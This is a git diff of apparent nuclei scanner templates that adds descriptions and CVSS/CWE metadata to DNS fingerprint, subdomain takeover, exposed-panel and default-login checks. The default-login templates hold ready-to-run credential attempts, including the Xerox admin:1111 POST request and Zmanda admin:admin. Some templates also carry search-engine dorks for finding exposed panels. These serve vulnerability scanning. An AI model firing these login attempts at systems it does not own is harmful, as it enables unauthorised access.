WorkCentre 7xxx Printer Default Login + author: MiroslavSotak + severity: high + description: Xerox WorkCentre 7xxx printer. default admin credentials admin:1111 were discovered. + reference: + - https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: xerox,default-login + +requests: + - raw: + - | + POST /userpost/xerox.set HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername={{username}}&webPassword={{password}}&frmaltDomain=default + + attack: pitchfork + payloads: + username: + - admin + password: + - 1111 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "window.opener.top.location.pathname" + - "Xerox Corporation" + condition: and + + - type: word + part: body + words: + - "invalid" + - "errmsg" + condition: or + negative: true + +# Enhanced by mp on 2022/03/13 diff --git a/default-logins/xxljob/xxljob-default-login.yaml b/default-logins/xxljob/xxljob-default-login.yaml index 11e08ec55c..9cf9eadb12 100644 --- a/default-logins/xxljob/xxljob-default-login.yaml +++ b/default-logins/xxljob/xxljob-default-login.yaml @@ -4,8 +4,14 @@ info: name: XXL-JOB Default Login author: pdteam severity: high + description: XXL-JOB default admin credentials were discovered. + reference: + - https://github.com/xuxueli/xxl-job + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,xxljob - reference: https://github.com/xuxueli/xxl-job requests: - raw: @@ -42,3 +48,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/14 diff --git a/default-logins/zabbix/zabbix-default-login.yaml b/default-logins/zabbix/zabbix-default-login.yaml index 58d665b220..f74389187e 100644 --- a/default-logins/zabbix/zabbix-default-login.yaml +++ b/default-logins/zabbix/zabbix-default-login.yaml @@ -3,7 +3,14 @@ id: zabbix-default-login info: name: Zabbix Default Login author: pdteam - severity: critical + severity: high + description: Zabbix default admin credentials were discovered. + reference: + - https://openbaton.github.io/documentation/zabbix-server-configuration-3.0/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: zabbix,default-login requests: @@ -26,9 +33,12 @@ requests: matchers-condition: and matchers: - type: word + part: header words: - "zabbix.php?action=dashboard.view" - type: status status: - 302 + +# Enhanced by mp on 2022/03/13 diff --git a/default-logins/zmanda/zmanda-default-login.yaml b/default-logins/zmanda/zmanda-default-login.yaml index 0ba28984fa..6716fa3213 100644 --- a/default-logins/zmanda/zmanda-default-login.yaml +++ b/default-logins/zmanda/zmanda-default-login.yaml @@ -4,8 +4,13 @@ info: name: Zmanda Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on Zmanda application. - reference: https://www.zmanda.com + description: Zmanda default admin credentials admin:admin were discovered. + reference: + - https://www.zmanda.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: zmanda,default-login requests: @@ -34,3 +39,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/04 diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index e6de245138..d1beecaf3e 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -1,18 +1,24 @@ id: azure-takeover-detection info: - name: Azure takeover detection + name: Microsoft Azure Takeover Detection author: pdteam severity: high + description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a DNS record points to a deprovisioned Azure resource. + reference: + - https://godiego.co/posts/STO/ + - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover + - https://cystack.net/research/subdomain-takeover-chapter-two-azure-services/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-404 tags: dns,takeover,azure - reference: https://godiego.co/posts/STO/ dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 3 + matchers-condition: and matchers: - type: word @@ -45,3 +51,5 @@ dns: group: 1 regex: - "IN\tCNAME\t(.+)" + +# Enhanced by mp on 2022/03/13 diff --git a/dns/caa-fingerprint.yaml b/dns/caa-fingerprint.yaml new file mode 100644 index 0000000000..032ddbdd44 --- /dev/null +++ b/dns/caa-fingerprint.yaml @@ -0,0 +1,31 @@ +id: caa-fingerprint + +info: + name: CAA Record + author: pdteam + severity: info + description: A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain. + reference: + - https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record + classification: + cwe-id: CWE-200 + tags: dns,caa + +dns: + - name: "{{FQDN}}" + type: CAA + + matchers: + - type: word + words: + - "IN\tCAA" + + extractors: + - type: regex + group: 1 + regex: + - 'issue "(.*)"' + - 'issuewild "(.*)"' + - 'iodef "(.*)"' + +# Enhanced by mp on 2022/03/22 diff --git a/dns/can-i-take-over-dns.yaml b/dns/can-i-take-over-dns.yaml deleted file mode 100644 index d8e4b48d41..0000000000 --- a/dns/can-i-take-over-dns.yaml +++ /dev/null @@ -1,140 +0,0 @@ -id: can-i-take-over-dns-fingerprint - -info: - name: Can I Take Over DNS - Fingerprint - author: pdteam - severity: info - tags: dns,ns - reference: https://github.com/indianajson/can-i-take-over-dns - -dns: - - name: "{{FQDN}}" - type: NS - class: inet - recursion: true - retries: 3 - - matchers-condition: or - matchers: - - type: word - name: 000domains - condition: or - words: - - "ns1.000domains.com" - - "ns2.000domains.com" - - "fwns1.000domains.com" - - "fwns2.000domains.com" - - - type: word - name: azure - condition: or - words: - - ".azure-dns.com" - - ".azure-dns.net" - - ".azure-dns.org" - - ".azure-dns.info" - - - type: word - name: bizland - condition: or - words: - - "ns1.bizland.com" - - "ns2.bizland.com" - - - type: word - name: digitalocean - condition: or - words: - - "ns1.digitalocean.com" - - "ns2.digitalocean.com" - - "ns2.digitalocean.com" - - - type: word - name: dnsmadeeasy - words: - - ".dnsmadeeasy.com" - - - type: word - name: dnsimple - condition: or - words: - - "ns1.dnsimple.com" - - "ns2.dnsimple.com" - - "ns3.dnsimple.com" - - "ns4.dnsimple.com" - - - type: word - name: domain - condition: or - words: - - "ns1.domain.com" - - "ns2.domain.com" - - - type: word - name: dotster - condition: or - words: - - "ns1.dotster.com" - - "ns2.dotster.com" - - - type: word - name: easydns - condition: or - words: - - "dns1.easydns.com" - - "dns2.easydns.com" - - "dns3.easydns.com" - - "dns4.easydns.com" - - - type: word - name: googledomains - words: - - ".googledomains.com" - - - type: word - name: hurricane-electric - condition: or - words: - - "ns1.he.net" - - "ns2.he.net" - - "ns3.he.net" - - "ns4.he.net" - - "ns5.he.net" - - - type: word - name: linode - condition: or - words: - - "ns1.linode.com" - - "ns1.linode.com" - - - type: word - name: mydomain - condition: or - words: - - "ns1.mydomain.com" - - "ns2.mydomain.com" - - - type: word - name: name - words: - - ".name.com" - - - type: word - name: nsone - words: - - ".nsone.net" - - - type: word - name: tierranet - condition: or - words: - - "ns1.domaindiscover.com" - - "ns2.domaindiscover.com" - - - type: word - name: yahoo - condition: or - words: - - "yns1.yahoo.com" - - "yns2.yahoo.com" diff --git a/dns/cname-fingerprint.yaml b/dns/cname-fingerprint.yaml new file mode 100644 index 0000000000..7f03f7f68f --- /dev/null +++ b/dns/cname-fingerprint.yaml @@ -0,0 +1,30 @@ +id: cname-fingerprint + +info: + name: CNAME Fingerprint + author: pdteam + severity: info + description: A CNAME DNS record was discovered. + reference: + - https://www.theregister.com/2021/02/24/dns_cname_tracking/ + - https://www.ionos.com/digitalguide/hosting/technical-matters/cname-record/ + classification: + cwe-id: CWE-200 + tags: dns,cname + +dns: + - name: "{{FQDN}}" + type: NS + + matchers: + - type: word + words: + - "IN\tCNAME" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tCNAME\t(.+)" + +# Enhanced by mp on 2022/03/13 diff --git a/dns/cname-service-detection.yaml b/dns/cname-service-detection.yaml index 2e16efc356..4a441a0b4d 100644 --- a/dns/cname-service-detection.yaml +++ b/dns/cname-service-detection.yaml @@ -1,17 +1,19 @@ id: cname-service-detection info: - name: cname service detection + name: CNAME Service Detection author: pdteam severity: info - tags: dns + description: A CNAME service was detected. + reference: + - https://ns1.com/resources/cname + classification: + cwe-id: CWE-200 + tags: dns,service dns: - name: "{{FQDN}}" type: CNAME - class: inet - recursion: true - retries: 3 matchers-condition: or matchers: @@ -34,3 +36,5 @@ dns: name: wix words: - "wixdns.net" + +# Enhanced by mp on 2022/03/13 diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml index 7f0f4ec6ea..88e0a62c5b 100644 --- a/dns/detect-dangling-cname.yaml +++ b/dns/detect-dangling-cname.yaml @@ -1,22 +1,23 @@ id: detect-dangling-cname info: - name: Detect Dangling cname + name: CNAME Detect Dangling author: pdteam,nytr0gen severity: info - tags: dns,takeover + description: A CNAME detect dangling condition was discovered. Most commonly this relates to failing to remove records from the zone once they are no longer needed. reference: - https://securitytrails.com/blog/subdomain-takeover-tips - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/ - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover + classification: + cwe-id: CWE-200 + tags: dns,takeover dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 3 + matchers-condition: and matchers: - type: word @@ -32,3 +33,5 @@ dns: group: 1 regex: - "IN\tCNAME\t(.+)" + +# Enhanced by mp on 2022/03/13 diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index 2c7870a1f1..d6752592dc 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -4,20 +4,17 @@ info: name: DNS WAF Detection author: lu4nx severity: info + description: A DNS WAF was detected. + classification: + cwe-id: CWE-200 tags: tech,waf,dns dns: - name: "{{FQDN}}" type: CNAME - recursion: true - retries: 5 - class: inet - name: "{{FQDN}}" type: NS - recursion: true - retries: 5 - class: inet matchers: - type: word @@ -170,3 +167,5 @@ dns: name: edns words: - ".iidns.com" + +# Enhanced by mp on 2022/03/13 diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml index 7c64193c85..6563ec92fd 100644 --- a/dns/dnssec-detection.yaml +++ b/dns/dnssec-detection.yaml @@ -2,21 +2,24 @@ id: dnssec-detection info: name: DNSSEC Detection - description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled. author: pdteam severity: info + description: Domain Name System Security Extensions (DNSSEC) are enabled. The Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled. + reference: + - https://www.icann.org/resources/pages/dnssec-what-is-it-why-important-2019-03-05-en + - https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/ + classification: + cwe-id: CWE-200 tags: dns,dnssec - reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/ dns: - name: "{{FQDN}}" type: DS - class: inet - recursion: true - retries: 3 extractors: - type: regex group: 1 regex: - "IN\tDS\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/ec2-detection.yaml b/dns/ec2-detection.yaml index f8f9b9a950..9ffb7ee163 100644 --- a/dns/ec2-detection.yaml +++ b/dns/ec2-detection.yaml @@ -1,21 +1,24 @@ id: ec2-detection info: - name: AWS EC2 detection + name: AWS EC2 Detection author: melbadry9 severity: info + description: Amazon Elastic Compute Cloud (EC2) detected. + reference: + - https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state + classification: + cwe-id: CWE-200 tags: dns,ec2,aws - reference: https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state dns: - name: "{{FQDN}}" type: CNAME - class: inet - recursion: true - retries: 2 extractors: - type: regex regex: - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/elasticbeantalk-takeover.yaml b/dns/elasticbeantalk-takeover.yaml index d8b6ddfc4f..99d5168687 100644 --- a/dns/elasticbeantalk-takeover.yaml +++ b/dns/elasticbeantalk-takeover.yaml @@ -1,14 +1,19 @@ id: elasticbeantalk-takeover info: - name: ElasticBeanTalk takeover detection + name: ElasticBeanTalk Subdomain Takeover Detection author: philippedelteil,rotemreiss severity: high + description: ElasticBeanTalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical + name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 # kudos to @m7mdharoun for sharing process details. + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 - https://twitter.com/payloadartist/status/1362035009863880711 - https://www.youtube.com/watch?v=srKIqhj_ki8 - tags: dns,takeover,aws + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-404 metadata: comments: | Only CNAMEs with region specification are hijackable. @@ -19,13 +24,11 @@ info: For example: CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c + tags: dns,takeover,aws dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 3 matchers-condition: and matchers: @@ -43,3 +46,5 @@ dns: group: 1 regex: - "IN\tCNAME\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/mx-fingerprint.yaml b/dns/mx-fingerprint.yaml new file mode 100644 index 0000000000..36798b8b87 --- /dev/null +++ b/dns/mx-fingerprint.yaml @@ -0,0 +1,30 @@ +id: mx-fingerprint + +info: + name: MX Record Detection + author: pdteam + severity: info + description: An MX record was detected. MX records direct emails to a mail exchange server. + reference: + - https://www.cloudflare.com/learning/dns/dns-records/dns-mx-record/ + - https://mxtoolbox.com/ + classification: + cwe-id: CWE-200 + tags: dns,mx + +dns: + - name: "{{FQDN}}" + type: MX + + matchers: + - type: word + words: + - "IN\tMX" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tMX\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/mx-service-detector.yaml b/dns/mx-service-detector.yaml index 0b0ea1c0d4..9a8563e2c6 100644 --- a/dns/mx-service-detector.yaml +++ b/dns/mx-service-detector.yaml @@ -1,24 +1,25 @@ id: mx-service-detector info: - name: E-mail service detector + name: Email Service Detector author: binaryfigments severity: info - description: Check the email service or spam filter that is used for a domain. - tags: dns + description: An email service was detected. Check the email service or spam filter that is used for a domain. + classification: + cwe-id: CWE-200 + tags: dns,service dns: - name: "{{FQDN}}" type: MX - class: inet - recursion: true - retries: 5 + matchers-condition: or matchers: - type: word name: "Office 365" words: - "mail.protection.outlook.com" + - type: word name: "Google Apps" words: @@ -27,21 +28,25 @@ dns: - "alt1.aspmx.l.google.com" - "alt2.aspmx.l.google.com" - "aspmx.l.google.com" + - type: word name: "ProtonMail" words: - "mail.protonmail.ch" - "mailsec.protonmail.ch" + - type: word name: "Zoho Mail" words: - "mx.zoho.eu" - "mx2.zoho.eu" - "mx3.zoho.eu" + - type: word name: "ForcePoint Email Security" words: - "in.mailcontrol.com" + - type: word name: "E-Zorg NL" words: @@ -49,24 +54,30 @@ dns: - "spamfilter01.ezorg.nl" - "spamfilter.ezorg.nl" - "spamfilter03.ezorg.nl" + - type: word name: "Kerio Cloud EU" words: - "mx1.eu1.kerio.cloud" - "mx2.eu1.kerio.cloud" + - type: word name: "Kerio Cloud US" words: - "mx1.us1.kerio.cloud" - "mx2.us1.kerio.cloud" - "mx3.us1.kerio.cloud" + - type: word name: "Proofpoint EU" words: - "mx1-eu1.ppe-hosted.com" - "mx2-eu1.ppe-hosted.com" + - type: word name: "Proofpoint US" words: - "mx1-us1.ppe-hosted.com" - "mx2-us1.ppe-hosted.com" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/nameserver-fingerprint.yaml b/dns/nameserver-fingerprint.yaml new file mode 100644 index 0000000000..2db0863467 --- /dev/null +++ b/dns/nameserver-fingerprint.yaml @@ -0,0 +1,27 @@ +id: nameserver-fingerprint + +info: + name: NS Record Detection + author: pdteam + severity: info + description: An NS record was detected. An NS record delegates a subdomain to a set of name servers. + classification: + cwe-id: CWE-200 + tags: dns,ns + +dns: + - name: "{{FQDN}}" + type: NS + + matchers: + - type: word + words: + - "IN\tNS" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tNS\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/ptr-fingerprint.yaml b/dns/ptr-fingerprint.yaml new file mode 100644 index 0000000000..6abf192f59 --- /dev/null +++ b/dns/ptr-fingerprint.yaml @@ -0,0 +1,27 @@ +id: ptr-fingerprint + +info: + name: PTR Detected + author: pdteam + severity: info + description: A PTR record was detected. A PTR record refers to the domain name. + classification: + cwe-id: CWE-200 + tags: dns,ptr + +dns: + - name: "{{FQDN}}" + type: PTR + + matchers: + - type: word + words: + - "IN\tPTR" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tPTR\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index 21722ac4c7..711fe24386 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml @@ -1,19 +1,23 @@ id: servfail-refused-hosts info: - name: Servfail Host Finder + name: DNS Servfail Host Finder author: pdteam severity: info + description: A DNS ServFail error occurred. ServFail errors occur when there is an error communicating with a DNS server. This could have a number of causes, including an error on the DNS server itself, or a temporary + networking issue. + classification: + cwe-id: CWE-200 tags: dns,takeover dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 3 + matchers: - type: word words: - "SERVFAIL" - "REFUSED" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/spoofable-spf-records-ptr.yaml b/dns/spoofable-spf-records-ptr.yaml index dd8d16e525..48815cf189 100644 --- a/dns/spoofable-spf-records-ptr.yaml +++ b/dns/spoofable-spf-records-ptr.yaml @@ -1,21 +1,25 @@ id: spoofable-spf-records-ptr info: - name: Find spoofable SPF records containing the PTR mechanism + name: Spoofable SPF Records with PTR Mechanism author: binaryfigments severity: info - description: Check if TXT records in DNS for SPF records that have the PTR mechanism that is spoofable. + description: SPF records in DNS containing a PTR mechanism are spoofable. + reference: + - https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability + classification: + cwe-id: CWE-200 tags: dns,spf dns: - name: "{{FQDN}}" type: TXT - class: inet - recursion: true - retries: 3 + matchers: - type: word words: - "v=spf1" - " ptr " - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/14 diff --git a/dns/txt-fingerprint.yaml b/dns/txt-fingerprint.yaml new file mode 100644 index 0000000000..4f0616a877 --- /dev/null +++ b/dns/txt-fingerprint.yaml @@ -0,0 +1,29 @@ +id: txt-fingerprint + +info: + name: DNS TXT Record Detected + author: pdteam + severity: info + description: A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server. + reference: + - https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/ + classification: + cwe-id: CWE-200 + tags: dns,txt + +dns: + - name: "{{FQDN}}" + type: TXT + + matchers: + - type: word + words: + - "IN\tTXT" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tTXT\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/worksites-detection.yaml b/dns/worksites-detection.yaml index 9832542bb3..104017e399 100644 --- a/dns/worksites-detection.yaml +++ b/dns/worksites-detection.yaml @@ -1,19 +1,23 @@ id: detect-worksites info: - name: worksites.net service detection + name: Worksites.net Service Detection author: melbadry9 severity: info - tags: dns - reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites + description: A worksites.net service was detected. + reference: + - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites + classification: + cwe-id: CWE-200 + tags: dns,service dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 2 + matchers: - type: word words: - "69.164.223.206" + +# Enhanced by mp on 2022/03/14 diff --git a/exposed-panels/3cx-phone-management-panel.yaml b/exposed-panels/3cx-phone-management-panel.yaml new file mode 100644 index 0000000000..1d7a536697 --- /dev/null +++ b/exposed-panels/3cx-phone-management-panel.yaml @@ -0,0 +1,28 @@ +id: 3cx-phone-management-panel + +info: + name: 3CX Phone System Management Console Detect + author: idealphase + severity: info + reference: + - https://www.3cx.com/ + - https://www.3cx.com/phone-system/ + - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 + metadata: + shodan-query: + - http.title:"3CX Phone System Management Console" + - http.favicon.hash:970132176 + google-query: intitle:"3CX Phone System Management Console" + tags: panel,3cx + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "3CX Phone System Management Console" + - "Welcome to the 3CX Management Console" + condition: or diff --git a/exposed-panels/3cx-phone-webclient-management-panel.yaml b/exposed-panels/3cx-phone-webclient-management-panel.yaml new file mode 100644 index 0000000000..1c4be16616 --- /dev/null +++ b/exposed-panels/3cx-phone-webclient-management-panel.yaml @@ -0,0 +1,26 @@ +id: 3cx-phone-webclient-management-panel + +info: + name: 3CX Phone System Webclient Management Console + author: idealphase + severity: info + reference: + - https://www.3cx.com/phone-system/ + - https://www.3cx.com/blog/unified-communications/client-apps/ + - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 + metadata: + shodan-query: http.title:"3CX Webclient" + google-query: intitle:"3CX Webclient" + tags: panel,3cx + +requests: + - method: GET + path: + - '{{BaseURL}}/webclient/' + + matchers: + - type: word + words: + - " 3CX Webclient" + - '' + condition: or \ No newline at end of file diff --git a/exposed-panels/3g-wireless-gateway.yaml b/exposed-panels/3g-wireless-gateway.yaml index e53f7f09f4..d8675d9ba9 100644 --- a/exposed-panels/3g-wireless-gateway.yaml +++ b/exposed-panels/3g-wireless-gateway.yaml @@ -1,25 +1,32 @@ -id: 3g-wireless-gateway -info: - name: 3G wireless gateway - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7050 - tags: panel,router - -requests: - - method: GET - path: - - "{{BaseURL}}/htmlcode/html/indexdefault.asp" - - matchers-condition: and - matchers: - - type: word - words: - - "g_i3gState" - - "g_sysinfo_sim_state" - - "g_iUID" - condition: and - - - type: status - status: - - 200 +id: 3g-wireless-gateway + +info: + name: 3G Wireless Gateway Detection + author: pussycat0x + severity: info + description: A 3G wireless gateway was detected. + reference: + - https://www.exploit-db.com/ghdb/7050 + classification: + cwe-id: CWE-200 + tags: panel,router + +requests: + - method: GET + path: + - "{{BaseURL}}/htmlcode/html/indexdefault.asp" + + matchers-condition: and + matchers: + - type: word + words: + - "g_i3gState" + - "g_sysinfo_sim_state" + - "g_iUID" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/14 diff --git a/exposed-panels/acemanager-login.yaml b/exposed-panels/acemanager-login.yaml index 396fd93468..4e352fe09e 100644 --- a/exposed-panels/acemanager-login.yaml +++ b/exposed-panels/acemanager-login.yaml @@ -1,32 +1,37 @@ -id: acemanager-login - -info: - name: ACEmanager detect - author: pussycat0x - severity: info - metadata: - fofa-dork: 'app="ACEmanager"' - tags: login,tech,acemanager - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '::: ACEmanager :::' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'ALEOS Version ([0-9.]+) \| Copyright &co' +id: acemanager-login + +info: + name: ACEmanager Detection + author: pussycat0x + severity: info + description: ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems. + classification: + cwe-id: CWE-200 + metadata: + fofa-dork: app="ACEmanager" + tags: panel,login,tech,acemanager + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '::: ACEmanager :::' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'ALEOS Version ([0-9.]+) \| Copyright &co' + +# Enhanced by mp on 2022/03/14 diff --git a/exposed-panels/acrolinx-dashboard.yaml b/exposed-panels/acrolinx-dashboard.yaml new file mode 100644 index 0000000000..8c3d55bd48 --- /dev/null +++ b/exposed-panels/acrolinx-dashboard.yaml @@ -0,0 +1,36 @@ +id: acrolinx-dashboard + +info: + name: Acrolinx Dashboard + author: ffffffff0x + severity: info + description: An Acrolinx Analytics dashboard was detected. + reference: + - https://docs.acrolinx.com/coreplatform/latest/en/analytics/acrolinx-analytics-dashboards + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title=="Acrolinx Dashboard" + shodan-query: http.title:"Acrolinx Dashboard" + google-dork: inurl:"Acrolinx Dashboard" + tags: acrolinx,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/dashboard.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Acrolinx Dashboard' + - 'Acrolinx' + condition: or + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/14 diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml index ea5abea227..66ec4748e9 100644 --- a/exposed-panels/active-admin-exposure.yaml +++ b/exposed-panels/active-admin-exposure.yaml @@ -4,7 +4,12 @@ info: name: ActiveAdmin Admin Dasboard Exposure author: pdteam severity: info - tags: panel + description: An ActiveAdmin Admin dashboard was discovered. + reference: + - https://activeadmin.info/ + classification: + cwe-id: CWE-200 + tags: panel,activeadmin requests: - method: GET @@ -15,4 +20,6 @@ requests: words: - "active_admin_content" - "active_admin-" - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/exposed-panels/activemq-panel.yaml b/exposed-panels/activemq-panel.yaml index fcc93b5236..7f435fed9a 100644 --- a/exposed-panels/activemq-panel.yaml +++ b/exposed-panels/activemq-panel.yaml @@ -4,7 +4,12 @@ info: name: Apache ActiveMQ Exposure author: pdteam severity: info - tags: panel + description: An Apache ActiveMQ implementation was discovered. + reference: + - https://activemq.apache.org/ + classification: + cwe-id: CWE-200 + tags: panel,activemq,apache requests: - method: GET @@ -16,4 +21,6 @@ requests: words: - '

Welcome to the Apache ActiveMQ!

' - 'Apache ActiveMQ' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/exposed-panels/acunetix-panel.yaml b/exposed-panels/acunetix-panel.yaml index 4a0bcf6c89..d9bb730073 100644 --- a/exposed-panels/acunetix-panel.yaml +++ b/exposed-panels/acunetix-panel.yaml @@ -1,9 +1,14 @@ id: acunetix-panel-detect info: - name: Acunetix Panel detector + name: Acunetix Login Panel author: joanbono severity: info + description: An Acunetix login panel was detected. + reference: + - https://www.acunetix.com/ + classification: + cwe-id: CWE-200 tags: panel requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adiscon-loganalyzer.yaml b/exposed-panels/adiscon-loganalyzer.yaml index 5f0e0bd13c..086763aa89 100644 --- a/exposed-panels/adiscon-loganalyzer.yaml +++ b/exposed-panels/adiscon-loganalyzer.yaml @@ -1,11 +1,14 @@ id: adiscon-loganalyzer info: - name: Detect exposed Adiscon LogAnalyzer + name: Adiscon LogAnalyzer Detection author: geeknik severity: high - description: Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services. - reference: https://loganalyzer.adiscon.com/ + description: Adiscon LogAnalyzer was discovered. Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing and analysis of real-time network events and reporting services. + reference: + - https://loganalyzer.adiscon.com/ + classification: + cwe-id: CWE-200 tags: adiscon,loganalyzer,syslog,exposures requests: @@ -32,3 +35,5 @@ requests: part: header words: - 'text/html' + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adminer-panel.yaml b/exposed-panels/adminer-panel.yaml index d15890b1c8..0adab4e046 100644 --- a/exposed-panels/adminer-panel.yaml +++ b/exposed-panels/adminer-panel.yaml @@ -1,31 +1,35 @@ id: adminer-panel + info: - name: Adminer Login panel + name: Adminer Login Panel author: random_robbie,meme-lord severity: info - reference: https://blog.sorcery.ie/posts/adminer/ - tags: panel - - # <= 4.2.4 can have unauthenticated RCE via SQLite driver - # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL - # Most versions have some kind of SSRF usability - # Is generally handy if you find SQL creds + description: An Adminer login panel was detected. + reference: + - https://blog.sorcery.ie/posts/adminer/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: title:"Login - Adminer" + tags: panel,adminer requests: - method: GET path: + - '{{BaseURL}}/adminer.php' - '{{BaseURL}}/_adminer.php' - '{{BaseURL}}/adminer/' - - '{{BaseURL}}/adminer.php' - '{{BaseURL}}/editor.php' - '{{BaseURL}}/mysql.php' - '{{BaseURL}}/sql.php' - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php' + headers: + Accept-Language: en-US,en;q=0.5 + stop-at-first-match: true matchers-condition: and 